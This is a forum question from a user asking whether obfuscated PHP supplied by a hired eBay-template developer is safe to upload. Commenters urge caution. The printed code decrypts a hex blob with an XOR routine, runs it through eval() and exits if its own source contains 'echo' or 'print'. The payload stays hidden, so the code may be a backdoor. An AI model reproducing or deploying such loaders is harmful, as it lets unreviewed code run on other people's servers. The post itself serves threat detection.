# How can I figure out of a piece of code is safe from an outside developer?

Tags: php, encryption

I hired someone to create an ebay template for me and he asked me to upload files containing the following code to my server in addition to other images and css files which are part of the ebay template. I'm not sure what to make of this code or even take a guess at what it is supposed to do. How do I figure out of this is safe or if this is some kind of trap?
listing.php:

```
<?php if(!function_exists('findsysfolder')){function findsysfolder($fld){$fld1=dirname($fld);$fld=$fld1.'/webmaster';clearstatcache();if(!is_dir($fld))return findsysfolder($fld1);else return $fld;}}require_once(findsysfolder(__FILE__).'/911006.php');$REXISTHECAT4FBI='FE50E574D754E76AC679F242F450F768FB5DCB77F34DE341 660C280D176E374DE7FB3B090A782B6B68DBC97BEAD93B681C452F25BE26';g0666f0acdeed38d4cd9084ade1739498(f0666f0acdeed38d4cd9084ade1739498(__FILE__));$REXISTHEDOG4FBI='E910 D B 940EB191028744C359EEF56D82643A78D462EB2AEFE3F9A405A3B84F55FF16E8CDA E 516BA63DF 7 B33948EF4 D1DC624A4C14CDE E51E2106B93BF 7 A65E77BF96BFC7BFF A1C6BFB145BFE 64CF51ABC54E2 8 643FA 3126AE07CE4 92B4FE5639340F77EE819C176F45339279493DCD7 55FF41BC5 011 A E3FEE5AFC2E94F32990449CE241F06EDF6DDF 13793F6659691DACC 74F80B05786D278AFAE91C95EE6 F57DD 218 A66F8 86086E275F8 85EDC6190EC 01537476028D4 312BB6D90B42DD97EC41AC3D944465AF92DA925AD54FA34AF51E87B94508FB122BD6FDD3466EA1939E1779F598C31D370A13C9F5E85DE7AE27CE925BE688CD97798CF 74CF12CCB 058EB12C6 05A8AB21544F15C84C5133EE977CA 82EDE E4AEE2EA038E96C9E3A82A94A8FC7133FE9 CB1588D83D9 844EC5CFF26 ABE11BA679856F821CA19B75CEA124C85E721B621BF6E9F5FF51CC5 04EFA5A8F399240E769EC6BDA44E96A9F409032EB5A8DC7 82CDB73D874B36192CE 22670EF59FA18A13FEF5CFD438AA8578796F520A5FC7DCB79D4709C47FB5544EE25CD73A649449280CE7AD37DA24B88C379AA58F85D81B01BB96CEE2E94CD 22EAB2677E8271E7EED2F943CE879A73C9E5988C211B975A85A8FFE62F25787CC 55FE520C9 B4092F837EE6788AC25A6548B4DF1679557F659FE20CD 64023C31FA963F512BB 02BD178DE37E34936639B4A993EDE749C3E86ED2F933D96B86282D67BAA3892FB11 5 3 173EF54B3DF52C07E8D81FF 6B0A238EE6BD34AFB5CF54BC3B14E463023B612CF35296CEB2A276F9835F21675D574B521B152874197CEB45FE95FF724E21548361AA030D833DB7ECE 33465D8 32C16349353F363ED104D339ACF7FAB2D90C874DE 74681AA12BC77DC438ADF12C3 1449C4C36DA7AB558F129E474A2FF40E721AE1B7DBA5E913FF537AE167FD17ECF18 731953168A7593A5A95B31C4FFC4BE87B97B861E56BEE28D4 517D076E920CD 23B98C8B375EF65B455FA34AC64C873E71B719325AF9A57EB77D5 020DF7BB14B4E44F342F22991B6AEDB 1 9C6688AC36EAF25BA73E626BC15C058BD 35F87B15DE0 72AA824E177A63E9550F65CF96FDF1EC2 B70983F89B62917A63EF211B01441E148F25E99439924D3 977C61FC37DDA6EEB C2A14BE7899C8 D3781A03F96B577E368EE12CC72D842E06BE952F335AC147EEA2598CDB95CC67A9C4C42443C8AAE2D629C478C8DC0B16CA2361CDD75D5BC14329B3321 FB320AA54CE 8548DF07A9C888DAFEA5380B6 BBB24E31CC2D2 C37AA2DD17CA721AE94B5DA6EF45D9B40482BE55489FF 471D8749B4F8C30AE56F05DAB6B97C5C06FEC2CA622 82177D76D9F462C91BB6BA535D867993D528CB12BAD2AE5 C2CAC629B32A4405FC2 5B564A52272D7 32AD014 23B95CCB514CD7FC76BD176E761CAA851F41DC8C7769F2138508746EB58B924 F2915A88B4D9A25C7769820A4639328A5F737E9197BB458FB16369F59F868D315469BF159C9BA E36E06BEA D 4C51A78E95FE374EC1379DA6E89F34690FE1AD3 85E9247FB5CF91C3FF85B81F410BE69E613B5 62DDF29AD133FEF1DB5719F26B566D07FC41ACF 94B9584BB7AB3E5 4C5 65A8DCE E4D86B162E668E813C4 254FB25B8 733AA508C3DEA17B3E23AF5107C9C5A80DA78A716C4 04022DB7FCF A2510CF 238E23D924E8BF15BF31B 64C82C7 32E14A955F914 62C9AB3D734DD1FB3 94733ED60A965DF22AC4847E77C9D57F123A62AD071AB113EF257FD3B9A8EDF39F22AAFDB7A98578785F61673DD A59C4 C4583BD1FA222D2B975DB7CE12467A2E65DEC6487F54A8ED342E719AC59FB12B65BE51DB3E827D1 312B8B372A23DFA2AABE622BD6EE679B760F71970E21D E79B65CF342E77FBE16B16CA5F56BA15D3FF8518E405FE925AD9325A659C4C1C87CAFA25CEB4F3D8FCE 75B8E3E9F5B97C0 44B3F2DCBC2AC9BCE79A6EA5E8C8AF56CF157FC73E14940FF779621CE36237E9A55C2 7 517D07DF719 A77913C2C67A6E22712CB 25EBFA44A85CBB75148F627A761E073AD60FE4280A463993723DA7FDC 9 37CCD 36EAF269933D817C5CE7BAD1CB96BA1538932EB2768DD74A545F05480B22C6FAA292461A56095CE 41535F31BAE60CC7FDD 349F54783A895FE BBE58C7AC3121 B75E01C4D3369D1 02DAE22A75B86BB18D7 D4F45E7538A35AC9751F9519482F630994A37AC2AE7689923A24A368AC3 F3DF7379E51FF59E719BF59B32FE91E479AFE23DD C563D2869D7484881868342305AEF1F CCA64A8473C5FA4438DB32566CD FB81440E827DA372C19A3241B79EC5CFA1ECC78CD79A14DC57BAE5BB51EC2 DC2 7 4C27390FC60CC B3DA78CB62A94439656F6508EBE ABF17D312CB147EBF 55AC3C1B7 15DFB6CD079D1 D3FD83F2BE260F6234D3980C76FD2 E F523CFA68DD4C309AFC75C374E26B9B45F95587F332E6779CBDDC6B9F3ADE64D4 A36A3F276E01FCFC17DB517412F6DAC15B59F96F3498BAC9757F322 F4680BD2DDA62F066A729A418CF47339649FD1044F944F74459974E8697FE73AD5588F6369AC4B01FD0C5DA15CD7F9EF76AA4518AF028AAEE56B5A81071E348FC48472C1E DB0A2972261D830E96BF8638F3C81D4 36EA927C973F915D0779E33BBAA62EE6DE04AF12DA38F498BC675E354E56E88F066EC5087B49F29D616BF1A 24C85CDC1BAAF14B82C1AD4 1 DCA7D849F5DE3194059D0 8458C8DAA9ABF 52F259739E33FFE4181B66ED2709D8EFC3A8983FD18A65CF323B9 23AE63790CE 83EE033EC26A7FD73914BB52517 1 C50F5117CB1E323DC7C82F342FD5888AB6DDB68ED12CC 0412A1A7AC4B8D9137C9857C8C1 7 774B2A9E01E1372DC54B5779AFB3A365646FB3021C7D670D863B19B2AE47FD57BB21243954987BD1E 5297FC979EE2EA9157CBD D4396BB7AB21BCA 5B7 2789A8F3986A55C809428E210C6 03FFC54FA2B9555FC56F05BB22575E214CA14C47CD83316B968F85F82AC2AA12F18 A7590FA61BC A5652D426 753F05885C7 02DE07FB25CFE5C928D434884AF518DCB 37DB886A9949F23BD6BAA4B8FCF 731A71AA851F72FAEAB9BFB1ECF7ADF34A95580D773DE 333E419D5A7878792C978D977A74AFD5BFD32E0 E568C83C7 532A58094C975A028A321C172A5D9146458B463F625A632D6 35FE164C7688AD4 32F9735EB688983C775AD2F9A3DEF1C15B85D86CCDE12B361A913622974D2 12ED3 054FA339C34D97CA1EE16 570D8689AF92CD272A597CE 933A852B929CC7ECA 9423EF94477D9 3449948F12CA031E7157793FC6E9C564F33D971D3 246FF54F62921B12EAE55FF3748EA25AF2D29AF50FD4631D77CDC7DA8A0479547FE52F673A14A9E25CE7DD3389546F46CA79F55FB 5C3E2A9F95283AF277EDE F34EC34E8174DF31D65DB396AE74DF2397AEB 228A551F3594BF05285CCCD 3299B384B3F30E365E3418EC56BED13789E9580C8788AE91036A64DF053BF60E719BDCCAE5EFF5785F1183E9E45E86B9789F321ACD3136557BC183EF32C75AF5CF6598088FE 4 032EF13 ABE88D0B02FC16FE86BD91331A821C472D376AF6386A937E31748B0A427DACF34E61A 21ABA6B994A85BA59F154CE7ECEED3A1FC12DAC25D646CE 936E77BDF18 A6881D6 B37A4E86B9BBE65F32CE666F82CA6A5ED14 633938DCF7EAC5FE81E3A9E211D FC9E3D9BB9B39B527D5 47280A24A80D7 BB69383FB1FD4 45044EE1E3C9A4326B9153D8A4785DD103D4FB8D644F62C749E498FCC7EC067E061DEBB1CB81BC1689FE0 133913312 12FA92EDF17B32CA35BD4B71C3EF3174DF36F93CE77F363A3EA6299FB5EFE2FDA7CDC1043F45CA36335 71E75A246FA56F62EA52CE16FCA 447F7296ED87BB65EDB342BDE61AE8FC976D1 3729F3D9F3EE518117AE91FA1EE2D 857427BC7A2FD5A94BF6D9EF2799F3A94B819D7C2D16489C6 D5687AA57FA6B91C8183E91F45FFF628BCCD56836 261E1 829AB262167D97FC3A187C8 F46F62BDC 736EF1D1863B15FF16F94B91669A49A49829BFF2CAF12C0 130A427D95065564FFC1CC31139E27C84F85B968390BB6CE46DE6183BEA66E2AA8290B311C61EB768D07BE5739F5789FA58CD 8B292C972D773A75982C9 7 14C15ABFB43479CBC1BC21DBB77E16EEF5C8AAE5E86AC5CE1DCA73EE263E7163293F45A8ABA63BA984782C071D1 3518B42387DBE 55119 452F018B22ADD65D774D57599C67BB1F840F46788B9147CEF15 04589EB4889CF79AB5C93CD7FB6C7E6B11D6F4C5B86B620BE1D DCA94A7F324B31E AB35889C970EF1A68A1518B85ABF6459B33DD779A3A4022C6 4418987D6A3186635558EAE29D0 341F863F45B85AF57344B28C9 54985A0EFCD 62DE56EE37CB6B262E8143C417CC777C1FE38 07980C9 B381AD4CD70993B92F35D38A838E217 F F5B89B96FD1B1943596F76994C01B3CE42B60BEBA98554C8AEF63FD30A782C8DC 026B61F 66E83B11DCC 312 02FAC89D97695419C3B503D26227BBBBFCBEAB5F0BF';$REXISTHECAT4FBI='94CD76CD371C5A7BC70C186E779C293B9B49BACA5A781A6'; eval(y0666f0acdeed38d4cd9084ade1739498('9CBC9CE62A2E54BE89',$REXISTHEDOG4FBI));?>
```

webmaster/911006.php:

```
<?php ini_set('include_path',dirname(__FILE__));function A4540acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){return $Xew6e79316561733d64abdf00f8e8ae48;}function b5434f0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){return $Xew6e79316561733d64abdf00f8e8ae48;}function c43dsd0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){return $Xew6e79316561733d64abdf00f8e8ae48;}function Xdsf0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){return $Xew6e79316561733d64abdf00f8e8ae48;}function y0666f0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){$x0b43c25ccf2340e23492d4d3141479dc='';$x71510c08e23d2083eda280afa650b045=0;$x16754c94f2e48aae0d6f34280507be58=strlen($x897356954c2cd3d41b221e3f24f99bba);$x7a86c157ee9713c34fbd7a1ee40f0c5a=hexdec('&H'.substr($x276e79316561733d64abdf00f8e8ae48,0,2));for($x1b90e1035d4d268e0d8b1377f3dc85a2=2;$x1b90e1035d4d268e0d8b1377f3dc85a2<strlen($x276e79316561733d64abdf00f8e8ae48);$x1b90e1035d4d268e0d8b1377f3dc85a2+=2){$xe594cc261a3b25a9c99ec79da9c91ba5=hexdec(trim(substr($x276e79316561733d64abdf00f8e8ae48, $x1b90e1035d4d268e0d8b1377f3dc85a2, 2)));$x71510c08e23d2083eda280afa650b045=(($x71510c08e23d2083eda280afa650b045<$x16754c94f2e48aae0d6f34280507be58)?$x71510c08e23d2083eda280afa650b045 + 1:1);$xab6389e47b1edcf1a5267d9cfb513ce5=$xe594cc261a3b25a9c99ec79da9c91ba5 ^ ord(substr($x897356954c2cd3d41b221e3f24f99bba, $x71510c08e23d2083eda280afa650b045-1, 1));if($xab6389e47b1edcf1a5267d9cfb513ce5<=$x7a86c157ee9713c34fbd7a1ee40f0c5a)$xab6389e47b1edcf1a5267d9cfb513ce5=255+$xab6389e47b1edcf1a5267d9cfb513ce5-$x7a86c157ee9713c34fbd7a1ee40f0c5a;else $xab6389e47b1edcf1a5267d9cfb513ce5=$xab6389e47b1edcf1a5267d9cfb513ce5-$x7a86c157ee9713c34fbd7a1ee40f0c5a;$x0b43c25ccf2340e23492d4d3141479dc=$x0b43c25ccf2340e23492d4d3141479dc.chr($xab6389e47b1edcf1a5267d9cfb513ce5);$x7a86c157ee9713c34fbd7a1ee40f0c5a=$xe594cc261a3b25a9c99ec79da9c91ba5;} return $x0b43c25ccf2340e23492d4d3141479dc;}function f5434f0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function j43dsd0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function hdsf0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function tr5434f0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function f0666f0acdeed38d4cd9084ade1739498($x) { return implode('',file($x));} function g0666f0acdeed38d4cd9084ade1739498($s){return (strstr($s,'echo')==false?(strstr($s,'print')==false)?(strstr($s,'sprint')==false)?(strstr($s,'sprintf')==false)?false:exit():exit():exit():exit());}function hyr3dsd0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function uygf0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function drfg34f0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function jhkgvdsd0acdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;}function yrdhhdacdeed38d4cd9084ade1739498($x897356954c2cd3d41b221e3f24f99bba,$x276e79316561733d64abdf00f8e8ae48){if(file_exists($x456e79316561733d64abdf00f8e8ae48)){unlink($x456e79316561733d64abdf00f8e8ae48);};return $Xew6e79316561733d64abdf00f8e8ae48;} ini_set('include_path','.');?>
```

Any help or advice you can provide will be much appreciated. Thanks!

Comment: You should ask him to send you the un-obfuscated version, so you can read the code.

Comment: Looks dodgy. It is encoded. Is it some kind of proprietary code?

Comment: I wouldn't dream of putting this on my server. It might be safe, but I would not be willing to take a stranger's word for it.

Comment: Thanks for the advice. Is there anyways for me to decode this enough to get some sense of it's purpose? If it's really a trap I doubt the developer would show me the unobfuscated version willingly.